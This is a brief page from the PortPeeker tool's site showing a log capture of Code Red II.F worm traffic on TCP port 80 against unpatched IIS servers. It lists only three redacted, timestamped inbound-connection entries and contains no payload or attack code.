Code RedII.f

PortPeeker Capture of CodeRedII Traffic

Code RedII.F description on F-Secure

TCP Port 80 (note: packet sizes can differ depending on the network configuration of the infected system)

Targets unpatched IIS Servers

x.x.x.x : 41659 TCP Data In
--- 29/03/2003 07:52:28.289

x.x.x.x : 41659 TCP Data In
--- 29/03/2003 07:52:28.480

x.x.x.x : 41659 TCP Data In
--- 29/03/2003 07:52:29.050

While PortPeeker is not an officially supported product, if you have any suggestions or find any bugs, please send them to PortPeeker@LinkLogger.com